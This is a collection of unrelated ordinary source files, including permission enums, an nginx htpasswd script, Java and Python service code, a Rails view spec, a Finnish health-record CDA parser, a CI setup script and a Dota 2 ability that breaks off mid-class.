defineEnum(Right_RIGHT_USER_INFO, "view user information")
defineEnum(Right_RIGHT_USER_SETTINGS_BASIC, "edit basic user settings")
defineEnum(Right_RIGHT_USER_SETTINGS_API_KEYS, "view and edit user API keys")
defineEnum(Right_RIGHT_USER_DELETE, "delete user account")
defineEnum(Right_RIGHT_USER_AUTHORIZED_CLIENTS, "view and edit authorized OAuth clients of the user")
defineEnum(Right_RIGHT_USER_APPLICATIONS_LIST, "list applications the user is a collaborator of")
defineEnum(Right_RIGHT_USER_APPLICATIONS_CREATE, "create an application under the user account")
defineEnum(Right_RIGHT_USER_GATEWAYS_LIST, "list gateways the user is a collaborator of")
defineEnum(Right_RIGHT_USER_GATEWAYS_CREATE, "create a gateway under the user account")
defineEnum(Right_RIGHT_USER_CLIENTS_LIST, "list OAuth clients the user is a collaborator of")
defineEnum(Right_RIGHT_USER_CLIENTS_CREATE, "create an OAuth client under the user account")
defineEnum(Right_RIGHT_USER_ORGANIZATIONS_LIST, "list organizations the user is a member of")
defineEnum(Right_RIGHT_USER_ORGANIZATIONS_CREATE, "create an organization under the user account")
defineEnum(Right_RIGHT_USER_ALL, "all user rights")
defineEnum(Right_RIGHT_APPLICATION_INFO, "view application information")
defineEnum(Right_RIGHT_APPLICATION_SETTINGS_BASIC, "edit basic application settings")
defineEnum(Right_RIGHT_APPLICATION_SETTINGS_API_KEYS, "view and edit application API keys")
defineEnum(Right_RIGHT_APPLICATION_SETTINGS_COLLABORATORS, "view and edit application collaborators")
defineEnum(Right_RIGHT_APPLICATION_SETTINGS_PACKAGES, "view and edit application packages and associations")
defineEnum(Right_RIGHT_APPLICATION_DELETE, "delete application")
defineEnum(Right_RIGHT_APPLICATION_DEVICES_READ, "view devices in application")
defineEnum(Right_RIGHT_APPLICATION_DEVICES_WRITE, "create devices in application")
defineEnum(Right_RIGHT_APPLICATION_DEVICES_READ_KEYS, "view device keys in application")
defineEnum(Right_RIGHT_APPLICATION_DEVICES_WRITE_KEYS, "edit device keys in application")
defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_READ, "read application traffic (uplink and downlink)")
defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_UP_WRITE, "write uplink application traffic")
defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_DOWN_WRITE, "write downlink application traffic")
defineEnum(Right_RIGHT_APPLICATION_LINK, "link as Application to a Network Server for traffic exchange, i.e. read uplink and write downlink")
defineEnum(Right_RIGHT_APPLICATION_ALL, "all application rights")
defineEnum(Right_RIGHT_CLIENT_ALL, "all OAuth client rights")
defineEnum(Right_RIGHT_GATEWAY_INFO, "view gateway information")
defineEnum(Right_RIGHT_GATEWAY_SETTINGS_BASIC, "edit basic gateway settings")
defineEnum(Right_RIGHT_GATEWAY_SETTINGS_API_KEYS, "view and edit gateway API keys")
defineEnum(Right_RIGHT_GATEWAY_SETTINGS_COLLABORATORS, "view and edit gateway collaborators")
defineEnum(Right_RIGHT_GATEWAY_DELETE, "delete gateway")
defineEnum(Right_RIGHT_GATEWAY_TRAFFIC_READ, "read gateway traffic")
defineEnum(Right_RIGHT_GATEWAY_TRAFFIC_DOWN_WRITE, "write downlink gateway traffic")
defineEnum(Right_RIGHT_GATEWAY_LINK, "link as Gateway to a Gateway Server for traffic exchange, i.e. write uplink and read downlink")
defineEnum(Right_RIGHT_GATEWAY_STATUS_READ, "view gateway status")
defineEnum(Right_RIGHT_GATEWAY_LOCATION_READ, "view gateway location")
defineEnum(Right_RIGHT_GATEWAY_WRITE_SECRETS, "store secrets for a gateway")
defineEnum(Right_RIGHT_GATEWAY_READ_SECRETS, "retrieve secrets associated with a gateway")
defineEnum(Right_RIGHT_GATEWAY_ALL, "all gateway rights")
defineEnum(Right_RIGHT_ORGANIZATION_INFO, "view organization information")
defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_BASIC, "edit basic organization settings")
defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_API_KEYS, "view and edit organization API keys")
defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_MEMBERS, "view and edit organization members")
defineEnum(Right_RIGHT_ORGANIZATION_DELETE, "delete organization")
defineEnum(Right_RIGHT_ORGANIZATION_APPLICATIONS_LIST, "list the applications the organization is a collaborator of")
defineEnum(Right_RIGHT_ORGANIZATION_APPLICATIONS_CREATE, "create an application under the organization")
defineEnum(Right_RIGHT_ORGANIZATION_GATEWAYS_LIST, "list the gateways the organization is a collaborator of")
defineEnum(Right_RIGHT_ORGANIZATION_GATEWAYS_CREATE, "create a gateway under the organization")
defineEnum(Right_RIGHT_ORGANIZATION_CLIENTS_LIST, "list the OAuth clients the organization is a collaborator of")
defineEnum(Right_RIGHT_ORGANIZATION_CLIENTS_CREATE, "create an OAuth client under the organization")
defineEnum(Right_RIGHT_ORGANIZATION_ADD_AS_COLLABORATOR, "add the organization as a collaborator on an existing entity")
defineEnum(Right_RIGHT_ORGANIZATION_ALL, "all organization rights")
defineEnum(Right_RIGHT_SEND_INVITES, "send user invites")
defineEnum(Right_RIGHT_ALL, "all possible rights")
}
|
#!/bin/bash
USERNAME=$1
PASSWORD=$2
htpasswd -b -c /etc/nginx/conf.d/password.htpasswd ${USERNAME} ${PASSWORD} |
<reponame>youaxa/ara-poc-open
package com.decathlon.ara.defect.github;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.ObjectMapper;
import lombok.RequiredArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
/**
* Map the Github API Json responses to Java POJO in this project.
*
* @author <NAME>
* @since 3.1.0
*/
@Service
@Slf4j
@RequiredArgsConstructor(onConstructor = @__(@Autowired))
class GithubMapper {
static final TypeReference<GithubIssue> TYPE_REFERENCE_TO_GITHUB_ISSUE =
new TypeReference<GithubIssue>() {
};
static final TypeReference<List<GithubIssue>> TYPE_REFERENCE_TO_LIST_GITHUB_ISSUE =
new TypeReference<List<GithubIssue>>() {
};
@Autowired
private final ObjectMapper objectMapper;
/**
* Map the given json String to a GithubIssue.
*
* @param json the GitHub REST API response json
* @return an optional containing the GithubIssue or an empty one if the json is malformed / don't match.
*/
Optional<GithubIssue> jsonToIssue(String json) {
try {
return Optional.of(this.objectMapper.readValue(json, TYPE_REFERENCE_TO_GITHUB_ISSUE));
} catch (IOException ex) {
log.warn("Unable to cast this json to a github issue : " + json, ex);
return Optional.empty();
}
}
/**
* Map the given json array String to a list GithubIssue.
*
* @param json the GitHub REST API response json
* @return the list of GithubIssue or an empty list if the json is malformed / don't match.
*/
List<GithubIssue> jsonToIssueList(String json) {
try {
return this.objectMapper.readValue(json, TYPE_REFERENCE_TO_LIST_GITHUB_ISSUE);
} catch (IOException ex) {
log.warn("Unable to cast this json to a list of github issues : " + json, ex);
return new ArrayList<>();
}
}
}
|
"use strict";
const _ = require('lodash');
const getNormalizedAttributeValue = require('../../../dom/attributes').getNormalizedAttributeValue;
const Assertions = require('../../../assertions');
const Types = require('../../../types');
class NgRepeatProcessor {
matches(domElement) {
return !_.isEmpty(getNormalizedAttributeValue(domElement, 'ng-repeat'));
}
process(context) {
let pageElement = context.addPageSection();
pageElement.addTypes(Types.NG_REPEAT);
pageElement.addAssertions(Assertions.COUNT);
context.setTraversePageTreeDownBeforeChildren();
context.setTraversePageTreeUpAfterChildren();
}
}
module.exports = NgRepeatProcessor; |
<gh_stars>1-10
# coding=utf-8
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Iterable, List, Optional
from fastapi import Depends
from rubrix.server.commons.es_helpers import sort_by2elasticsearch
from rubrix.server.datasets.model import Dataset
from rubrix.server.tasks.commons import (
BulkResponse,
EsRecordDataFieldNames,
SortableField,
)
from rubrix.server.tasks.commons.dao import extends_index_dynamic_templates
from rubrix.server.tasks.commons.dao.dao import DatasetRecordsDAO, dataset_records_dao
from rubrix.server.tasks.commons.dao.model import RecordSearch
from rubrix.server.tasks.commons.metrics.service import MetricsService
from rubrix.server.tasks.text_classification.api.model import (
CreationTextClassificationRecord,
TextClassificationQuery,
TextClassificationRecord,
TextClassificationSearchAggregations,
TextClassificationSearchResults,
)
extends_index_dynamic_templates(
{"inputs": {"path_match": "inputs.*", "mapping": {"type": "text"}}}
)
class TextClassificationService:
"""
Text classification service
"""
def __init__(
self,
dao: DatasetRecordsDAO,
metrics: MetricsService,
):
self.__dao__ = dao
self.__metrics__ = metrics
def add_records(
self,
dataset: Dataset,
records: List[CreationTextClassificationRecord],
):
self._check_multi_label_integrity(dataset, records)
self.__metrics__.build_records_metrics(dataset, records)
failed = self.__dao__.add_records(
dataset=dataset, records=records, record_class=TextClassificationRecord
)
return BulkResponse(dataset=dataset.name, processed=len(records), failed=failed)
def search(
self,
dataset: Dataset,
query: TextClassificationQuery,
sort_by: List[SortableField],
record_from: int = 0,
size: int = 100,
) -> TextClassificationSearchResults:
"""
Run a search in a dataset
Parameters
----------
dataset:
The records dataset
query:
The search parameters
sort_by:
The sort by list
record_from:
The record from return results
size:
The max number of records to return
Returns
-------
The matched records with aggregation info for specified task_meta.py
"""
results = self.__dao__.search_records(
dataset,
search=RecordSearch(
query=query.as_elasticsearch(),
sort=sort_by2elasticsearch(
sort_by,
valid_fields=[
"metadata",
EsRecordDataFieldNames.score,
EsRecordDataFieldNames.predicted,
EsRecordDataFieldNames.predicted_as,
EsRecordDataFieldNames.predicted_by,
EsRecordDataFieldNames.annotated_as,
EsRecordDataFieldNames.annotated_by,
EsRecordDataFieldNames.status,
EsRecordDataFieldNames.event_timestamp,
],
),
),
size=size,
record_from=record_from,
)
return TextClassificationSearchResults(
total=results.total,
records=[TextClassificationRecord.parse_obj(r) for r in results.records],
aggregations=TextClassificationSearchAggregations(
**results.aggregations,
words=results.words,
metadata=results.metadata or {},
)
if results.aggregations
else None,
)
def read_dataset(
self,
dataset: Dataset,
query: Optional[TextClassificationQuery] = None,
) -> Iterable[TextClassificationRecord]:
"""
Scan a dataset records
Parameters
----------
dataset:
The dataset name
query:
If provided, scan will retrieve only records matching
the provided query filters. Optional
"""
for db_record in self.__dao__.scan_dataset(
dataset, search=RecordSearch(query=query.as_elasticsearch())
):
yield TextClassificationRecord.parse_obj(db_record)
def _check_multi_label_integrity(
self, dataset: Dataset, records: List[TextClassificationRecord]
):
# Fetch a single record
results = self.search(
dataset, query=TextClassificationQuery(), size=1, sort_by=[]
)
if results.records:
is_multi_label = records[0].multi_label
assert is_multi_label == results.records[0].multi_label, (
"You cannot pass {labels_type} records for this dataset. "
"Stored records are {labels_type}".format(
labels_type="multi-label" if is_multi_label else "single-label"
)
)
_instance = None
def text_classification_service(
dao: DatasetRecordsDAO = Depends(dataset_records_dao),
metrics: MetricsService = Depends(MetricsService.get_instance),
) -> TextClassificationService:
"""
Creates a dataset record service instance
Parameters
----------
dao:
The dataset records dao dependency
metrics:
The metrics service
Returns
-------
A dataset records service instance
"""
global _instance
if not _instance:
_instance = TextClassificationService(dao=dao, metrics=metrics)
return _instance
|
<filename>spec/views/purchases/new.html.erb_spec.rb
require 'rails_helper'
RSpec.describe "purchases/new", type: :view do
before(:each) do
assign(:purchase, Purchase.new)
end
it "renders new purchase form" do
render
assert_select "form[action=?][method=?]", purchases_path, "post" do
assert_select "select[name=?]", "purchase[location_id]"
assert_select "input[name=?]", "purchase[total_price]"
assert_select "select[name=?]", "purchase[purchased_by_id]"
assert_select "select[name=?]", "purchase[reimbursed_by_id]"
assert_select "input[name=?]", "purchase[reimbursement_check_number]"
assert_select "input[name=?]", "purchase[reimbursement_status]"
end
end
end
|
my_list = [1, 2, 3, 4, 5]
if len(my_list) > 0:
element = my_list[0]
else:
element = None |
<reponame>villelaitila/KantaCDA-API
<!--
Copyright 2020 Kansaneläkelaitos
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy
of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
-->
package fi.kela.kanta.cda;
import java.io.IOException;
import java.io.Serializable;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Properties;
import javax.xml.bind.JAXBElement;
import org.apache.commons.configuration.ConfigurationException;
import org.hl7.v3.AD;
import org.hl7.v3.ANY;
import org.hl7.v3.AdxpCity;
import org.hl7.v3.AdxpCountry;
import org.hl7.v3.AdxpPostalCode;
import org.hl7.v3.AdxpStreetAddressLine;
import org.hl7.v3.BIN;
import org.hl7.v3.EN;
import org.hl7.v3.ENXP;
import org.hl7.v3.EnDelimiter;
import org.hl7.v3.EnFamily;
import org.hl7.v3.EnGiven;
import org.hl7.v3.EnPrefix;
import org.hl7.v3.EnSuffix;
import org.hl7.v3.PN;
import org.hl7.v3.POCDMT000040ClinicalDocument;
import org.hl7.v3.POCDMT000040InfrastructureRootTemplateId;
import org.hl7.v3.POCDMT000040Organization;
import org.hl7.v3.POCDMT000040Section;
import org.hl7.v3.StrucDocContent;
import org.hl7.v3.StrucDocParagraph;
import org.hl7.v3.StrucDocText;
import org.hl7.v3.TEL;
import fi.kela.kanta.exceptions.PurkuException;
import fi.kela.kanta.to.KokoNimiTO;
import fi.kela.kanta.to.LaakemaarayksenKorjausTO;
import fi.kela.kanta.to.LaakemaarayksenMitatointiTO;
import fi.kela.kanta.to.LaakemaaraysTO;
import fi.kela.kanta.to.LeimakentatTO;
import fi.kela.kanta.to.OrganisaatioTO;
import fi.kela.kanta.to.OsoiteTO;
import fi.kela.kanta.util.AsiakirjaVersioUtil;
import fi.kela.kanta.util.KantaCDAUtil;
public abstract class Purkaja {
final private static String sdfKuvio = "yyyyMMddHHmmss";
private static final String TelPrefix = "tel:";
private static final String EmailPrefix = "mailto:";
private static final String resepti_properties = "resepti.properties";
protected abstract String getCodeSystem();
private AsiakirjaVersioUtil versioUtil;
private MaarittelyKonfiguraatio maarittelyKonfiguraatio;
protected Purkaja() throws ConfigurationException {
if ( maarittelyKonfiguraatio == null ) {
maarittelyKonfiguraatio = MaarittelyKonfiguraatio.lueKonfiguraatio();
}
}
protected void puraLeimakentat(POCDMT000040ClinicalDocument clinicalDocument, LeimakentatTO<?> kentat)
throws PurkuException {
puraLeimakentat(clinicalDocument, kentat, false);
}
/**
* Purkaa annetusta clinicalDocumentista leimakentät Asettaa Oidin, SetIdn, CdaTyypin, versionumeron ja aikaleiman
* annettuun LeimakentatTO:sta perittyyn TOhon, annetun clinicaldocumentin pohjalta. jos isKooste on true asettaa
* cdaTyypiksi -1
*
* @param clinicalDocument
* POCDMT000040ClinicalDocument cda josta tietoja puretaan
* @param kentat
* LeimakantatTOsta periytyvä TO luokkaa johon tiedot sijoitetaan
* @param isKooste
* boolean tieto siitä onko kyseessä kooste
* @throws PurkuException
*/
protected void puraLeimakentat(POCDMT000040ClinicalDocument clinicalDocument, LeimakentatTO<?> kentat,
boolean isKooste) throws PurkuException {
kentat.setOid(clinicalDocument.getId().getRoot());
kentat.setSetId(clinicalDocument.getSetId().getRoot());
final String tyyppiKoodi = clinicalDocument.getCode().getCode();
if ( null != tyyppiKoodi && tyyppiKoodi.length() > 0 ) {
kentat.setCdaTyyppi(Integer.parseInt(tyyppiKoodi));
}
else {
if ( !isKooste ) {
throw new PurkuException("clinicalDocument/code/@code");
}
else {
kentat.setCdaTyyppi(-1);
}
}
final String versionumero = String.valueOf(clinicalDocument.getVersionNumber().getValue());
if ( versionumero.length() > 0 && !"null".equals(versionumero) ) {
kentat.setVersio(Integer.parseInt(versionumero));
}
else {
kentat.setVersio(0);
}
final String aikaleima = clinicalDocument.getEffectiveTime().getValue();
if ( null != aikaleima && aikaleima.length() > 12 && !"nulldate".equals(aikaleima) ) {
kentat.setAikaleima(puraAika(aikaleima.substring(0, 12)));
}
/*
* Järjestelmän ja version lukeminen
*/
if ( null != clinicalDocument.getLocalHeader()
&& null != clinicalDocument.getLocalHeader().getSoftwareSupport() ) {
String product = clinicalDocument.getLocalHeader().getSoftwareSupport().getProduct();
if ( null != product && product.length() > 0 ) {
kentat.setProduct(product);
}
String version = clinicalDocument.getLocalHeader().getSoftwareSupport().getVersion();
if ( null != version && version.length() > 0 ) {
kentat.setProductVersion(version);
}
}
/*
* CDA:n määrittelyversion päätteleminen / Header
*/
for (POCDMT000040InfrastructureRootTemplateId templateId : clinicalDocument.getTemplateIds()) {
if ( templateId.getRoot() != null && !templateId.getRoot().isEmpty() ) {
if ( templateId.getExtension() != null && !templateId.getExtension().isEmpty() ) {
kentat.getTemplateIds().add(templateId.getRoot() + "." + templateId.getExtension());
}
else {
kentat.getTemplateIds().add(templateId.getRoot());
}
}
}
/*
* CDA:n määrittelyversio / StructuredBody
*/
for (POCDMT000040InfrastructureRootTemplateId templateId : haeStructuredBodyTemplateIs(clinicalDocument)) {
if ( templateId.getRoot() != null && !templateId.getRoot().isEmpty() ) {
if ( templateId.getExtension() != null && !templateId.getExtension().isEmpty() ) {
kentat.getBodyTemplateIds().add(templateId.getRoot() + "." + templateId.getExtension());
}
else {
kentat.getBodyTemplateIds().add(templateId.getRoot());
}
}
}
kentat.setMaarittelyLuokka(maarittelyKonfiguraatio.haeMaarittelyLuokka(kentat.getTemplateIds(),
clinicalDocument.getCode().getCode()));
}
/**
* Apumetodi nimen purkamiseen Muodostaan KokoNimiTOn annetun PN Listan pohjalta
*
* @param names
* List<PN> nimet
* @return KokoNimiTO nimistä
*/
protected KokoNimiTO puraKokoNimi(List<PN> names) {
KokoNimiTO kokoNimi = new KokoNimiTO();
for (PN name : names) {
for (Serializable element : name.getContent()) {
if ( element instanceof JAXBElement<?> ) {
JAXBElement<?> el = (JAXBElement<?>) element;
if ( el.getValue() instanceof ENXP ) {
puraNimitieto((ENXP) el.getValue(), kokoNimi);
}
}
}
}
return kokoNimi;
}
/**
* Apumetodi organisaation tietojen purkamiseen
*
* @param representedOrganization
* POCDMT000040Organization josta tiedot poimitaan
* @return OrganisaatioTO johon tiedot sijoitetaan
*/
protected OrganisaatioTO puraOrganisaatio(POCDMT000040Organization organization) {
OrganisaatioTO organisaatioTO = new OrganisaatioTO();
organisaatioTO.setYksilointitunnus(organization.getIds().get(0).getRoot());
if ( !organization.getNames().isEmpty() ) {
organisaatioTO.setNimi((String) organization.getNames().get(0).getContent().get(0));
}
for (TEL tel : organization.getTelecoms()) {
if ( tel.getValue().startsWith(Purkaja.TelPrefix) ) {
organisaatioTO.setPuhelinnumero(tel.getValue());
if ( !tel.getUses().isEmpty() ) {
organisaatioTO.setPuhelinumeroKayttotarkoitus(tel.getUses().get(0));
}
}
else if ( tel.getValue().startsWith(Purkaja.EmailPrefix) ) {
organisaatioTO.setSahkoposti(tel.getValue());
}
}
if ( !organization.getAddrs().isEmpty() ) {
organisaatioTO.setOsoite(puraOsoite(organization.getAddrs().get(0)));
}
if ( organization.getAsOrganizationPartOf() != null
&& organization.getAsOrganizationPartOf().getWholeOrganization() != null ) {
organisaatioTO.setToimintaYksikko(
puraOrganisaatio(organization.getAsOrganizationPartOf().getWholeOrganization()));
}
return organisaatioTO;
}
/**
* Apumetodi osoitetietojen purkamiseen
*
* @param adddr
* AD josta osoitetietoja haetaan
* @return OsoiteTO johon löytyneet osoitetiedot on sijoitettu
*/
protected OsoiteTO puraOsoite(AD addr) {
// TODO: Parempi tapa tunnistaa elementit?
OsoiteTO osoite = new OsoiteTO();
for (Serializable serializable : addr.getContent()) {
if ( !(serializable instanceof JAXBElement<?>) ) {
continue;
}
JAXBElement<?> element = (JAXBElement<?>) serializable;
if ( element.getValue() instanceof AdxpStreetAddressLine ) {
AdxpStreetAddressLine value = (AdxpStreetAddressLine) element.getValue();
if ( value.getContent() != null && !value.getContent().isEmpty() ) {
osoite.setKatuosoite((String) value.getContent().get(0));
}
}
else if ( element.getValue() instanceof AdxpPostalCode ) {
AdxpPostalCode value = (AdxpPostalCode) element.getValue();
if ( value.getContent() != null && !value.getContent().isEmpty() ) {
osoite.setPostinumero((String) value.getContent().get(0));
}
}
else if ( element.getValue() instanceof AdxpCity ) {
AdxpCity value = (AdxpCity) element.getValue();
if ( value.getContent() != null && !value.getContent().isEmpty() ) {
osoite.setPostitoimipaikka((String) value.getContent().get(0));
}
}
else if ( element.getValue() instanceof AdxpCountry ) {
AdxpCountry value = (AdxpCountry) element.getValue();
if ( value.getContent() != null && !value.getContent().isEmpty() ) {
osoite.setMaa((String) value.getContent().get(0));
}
}
}
return osoite;
}
/**
* Apumetodi ajanpurkamiseen parsii annetun ajan jos aika ei ole null eikä sisällä muuta kuin numeroita olettaa että
* aika annetaan yyyyMMddHHmmss formaatissa Jos annettu aika pitempikuin 14 merkkiä, yli menevä osa pätkäistään pois
* Jos formaatti pattern on pidempi kuin annettu aika, pätkäistään siitä ylimenevä osa pois
*
* @param aika
* String purettava aika
* @return Date tai null jos annettu null tai liian lyhyt tai ei numeroita sisältävä merkkijono
* @throws PurkuException
*/
protected Date puraAika(String aika) throws PurkuException {
if ( aika != null ) {
String lyhytAika;
if ( aika.length() > Purkaja.sdfKuvio.length() ) {
lyhytAika = aika.substring(0, Purkaja.sdfKuvio.length());
}
else {
lyhytAika = aika;
}
// 0000-99999999999999
if ( lyhytAika.matches("[0-9]{4,14}") ) {
SimpleDateFormat sdf = new SimpleDateFormat(Purkaja.sdfKuvio.substring(0, lyhytAika.length()));
//sdf.setTimeZone(TimeZone.getTimeZone(ReseptiKasaaja.TIME_ZONE));
try {
return sdf.parse(lyhytAika);
}
catch (ParseException e) {
throw new PurkuException(aika);
}
}
}
return null;
}
/**
* Apumetodi jolla tarkistetaan onko merkkijono null tai tyhjä
*
* @param merkkijono
* Sring tarkistettava merkkijono
* @return boolean true jos merkkijono on null tai tyhja, muuten false
*/
protected boolean onkoNullTaiTyhja(String merkkijono) {
return null == merkkijono || merkkijono.isEmpty();
}
/**
* Apumetodi jolla voidaan hakea elementin content palauttaa elementin content listasta ensimmäisen itemin jos lista
* ei ole tyhjä.
*
* @param element
* ANY jonka content halutaan hakea
* @return String content listan ensimmäisestä itemistä, null jos lista tyhjä tai elementillä ei content listaa ole.
*/
protected String puraContent(ANY element) {
if ( element instanceof BIN && !((BIN) element).getContent().isEmpty() ) {
return (String) ((BIN) element).getContent().get(0);
}
else if ( element instanceof EN && !((EN) element).getContent().isEmpty() ) {
return (String) ((EN) element).getContent().get(0);
}
else if ( element instanceof AD && !((AD) element).getContent().isEmpty() ) {
return (String) ((AD) element).getContent().get(0);
}
return null;
}
/**
* Apumetodi nimitietojen purkamiseen. Purkaa ENXP elementin contentin ja qualifierin jos sellainen on. Lisää
* löytyneet nimi tiedot annettuun kokonimeen jos nimen tyyppi pystytään tunnistamaan.
*
* @param value
* ENXP elementti josta nimitietoja haetaan.
* @param kokoNimi
* KokoNimiTO johon nimitiedot laitetaan.
*/
private void puraNimitieto(ENXP value, KokoNimiTO kokoNimi) {
if ( null == value || value.getContent().isEmpty() ) {
return;
}
String nimi = (String) value.getContent().get(0);
String maare = null;
if ( !value.getQualifiers().isEmpty() ) {
maare = value.getQualifiers().get(0);
}
String tyyppi = null;
if ( value instanceof EnGiven ) {
tyyppi = "given";
}
else if ( value instanceof EnFamily ) {
tyyppi = "family";
}
else if ( value instanceof EnPrefix ) {
tyyppi = "prefix";
}
else if ( value instanceof EnSuffix ) {
tyyppi = "suffix";
}
else if ( value instanceof EnDelimiter ) {
tyyppi = "delimiter";
}
if ( null != nimi && null != tyyppi ) {
kokoNimi.lisaa(tyyppi, maare, nimi);
}
}
protected LaakemaaraysTO luoLaakemaaraysTO(POCDMT000040ClinicalDocument clinicalDocument) {
int tyyppiKoodi = Integer.parseInt(clinicalDocument.getCode().getCode());
if ( KantaCDAConstants.ReseptisanomanTyyppi.LAAKEMAARAYKSEN_KORJAUS.getTyyppi() == tyyppiKoodi ) {
return new LaakemaarayksenKorjausTO();
}
if ( KantaCDAConstants.ReseptisanomanTyyppi.LAAKEMAARAYKSEN_MITATOINTI.getTyyppi() == tyyppiKoodi ) {
return new LaakemaarayksenMitatointiTO();
}
return new LaakemaaraysTO();
}
protected Properties loadProperties() {
Properties props = null;
try {
props = KantaCDAUtil.loadProperties(resepti_properties);
}
catch (IOException e) {
throw new RuntimeException("KantaCDA-API / Purkaja: properties tiedoston luku epäonnistui", e);
}
return props;
}
protected void tarkistaAsiakirjaVersio(POCDMT000040ClinicalDocument clinicalDocument, LaakemaaraysTO laakemaarays) {
laakemaarays.setAsiakirjaYhteensopivuus(KantaCDAConstants.AsiakirjaVersioYhteensopivuus.EI_TUETTU);
List<POCDMT000040InfrastructureRootTemplateId> templatet = clinicalDocument.getTemplateIds();
if ( templatet != null && !templatet.isEmpty() ) {
String id = templatet.get(0).getRoot();
laakemaarays.setAsiakirjaVersio(id);
if ( versioUtil == null ) {
versioUtil = new AsiakirjaVersioUtil(loadProperties());
}
laakemaarays.setAsiakirjaYhteensopivuus(versioUtil.getAsiakirjaVersionYhteensopivuus(id));
}
}
/**
* Asetetaan asiakirjamääritysversioiden käsittelyyn tarvittava luokka ulkopäin. Tarkoitettu lähinnä testauksen
* helpottamiseen.
*
* @param versioUtil
* @deprecated
*/
@Deprecated
protected void setVersioUtil(AsiakirjaVersioUtil versioUtil) {
this.versioUtil = versioUtil;
}
protected void puraText(POCDMT000040Section section, List<String> nayttomuoto) {
StrucDocText text = section.getText();
if ( text != null && text.getContent() != null && !text.getContent().isEmpty() ) {
List<Serializable> content = text.getContent();
for (int i = 0; i < content.size(); i++) {
if ( !(content.get(i) instanceof JAXBElement) ) {
continue;
}
JAXBElement<?> elem = (JAXBElement<?>) content.get(i);
if ( elem.getValue() instanceof StrucDocParagraph ) {
StrucDocParagraph paragraph = (StrucDocParagraph) elem.getValue();
puraDocParagraph(paragraph, nayttomuoto);
}
}
}
}
protected void puraDocParagraph(StrucDocParagraph paragraph, List<String> nayttomuoto) {
List<Serializable> content = paragraph.getContent();
for (int i = 0; i < content.size(); i++) {
if ( content.get(i) instanceof JAXBElement ) {
JAXBElement<?> elem = (JAXBElement<?>) content.get(i);
if ( elem.getValue() instanceof StrucDocContent ) {
StrucDocContent doc = (StrucDocContent) elem.getValue();
puraDocContent(doc, nayttomuoto);
}
}
}
}
protected void puraDocContent(StrucDocContent content, List<String> nayttomuoto) {
List<Serializable> cont = content.getContent();
for (int i = 0; i < cont.size(); i++) {
if ( cont.get(i) instanceof String ) {
String arvo = (String) cont.get(i);
nayttomuoto.add(arvo);
}
}
}
/**
* Hakee clinicalDocument elementistä templateId:n rakenteesta component/structuredBody/component
*
* @param clinicalDocument
* POCDMT00040ClinicalDocument josta entryjä haetaan
* @return POCDMT000040InfrastructureRootTemplateId lista / tyhjä, jos rakennetta ei löydy
*/
private List<POCDMT000040InfrastructureRootTemplateId> haeStructuredBodyTemplateIs(
POCDMT000040ClinicalDocument clinicalDocument) {
if ( null == clinicalDocument || null == clinicalDocument.getComponent()
|| null == clinicalDocument.getComponent().getStructuredBody()
|| clinicalDocument.getComponent().getStructuredBody().getComponents().isEmpty() || clinicalDocument
.getComponent().getStructuredBody().getComponents().get(0).getTemplateIds().isEmpty() ) {
return new ArrayList<POCDMT000040InfrastructureRootTemplateId>();
}
return clinicalDocument.getComponent().getStructuredBody().getComponents().get(0).getTemplateIds();
}
}
|
#!/bin/bash
set -e
MAILCATCHER=$1
DIRPATH="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../../.. && pwd)"
chmod +x ${DIRPATH}/deploy/ci/travis/run-e2e-tests.sh
# We will install ffmpeg so we can capture a video of the display as the tests run
sudo add-apt-repository -y ppa:mc3man/trusty-media
sudo apt-get -qq update
if [ "${MAILCATCHER}" == "true" ]; then
docker run -d -p 1080:80 -p 1025:25 --name mail tophfr/mailcatcher
fi
|
<reponame>jaden-young/NWR
import { BaseAbility, BaseModifier, BaseModifierMotionHorizontal, registerAbility, registerModifier } from "../../../lib/dota_ts_adapter"
interface kv {
x: number;
y: number;
z: number;
}
@registerAbility()
export class haku_demonic_speed extends BaseAbility
{
lightning_blade_fx?: ParticleID;
active_target?: CDOTA_BaseNPC;
/****************************************/
Precache(context: CScriptPrecacheContext): void{
PrecacheResource("particle", "particles/units/heroes/haku/haku_demonic_speed.vpcf", context);
PrecacheResource("soundfile", "soundevents/heroes/haku/game_sounds_haku.vsndevts", context);
//PrecacheResource("soundfile", "soundevents/heroes/haku/game_sounds_vo_haku.vsndevts", context);
}
/****************************************/
GetCastRange(location: Vector, target: CDOTA_BaseNPC | undefined): number {
return IsClient() ? super.GetCastRange(location, target) : 50000;
}
/****************************************/
OnSpellStart(): void {
let caster = this.GetCaster();
let position = this.GetCursorPosition();
let origin = caster.GetAbsOrigin();
let range = this.GetSpecialValueFor("cast_range");
let distance = (position - origin as Vector).Length2D();
position = distance < range ? position : (position - origin as Vector).Normalized() * range + origin as Vector;
caster.AddNewModifier(caster, this, "modifier_haku_demonic_speed", {duration: -1, x: position.x, y: position.y, z: position.z})
EmitSoundOn("Hero_Haku.DemonicSpeed.Cast", caster);
}
}
@registerModifier()
export class modifier_haku_demonic_speed extends BaseModifierMotionHorizontal
{
position?: Vector;
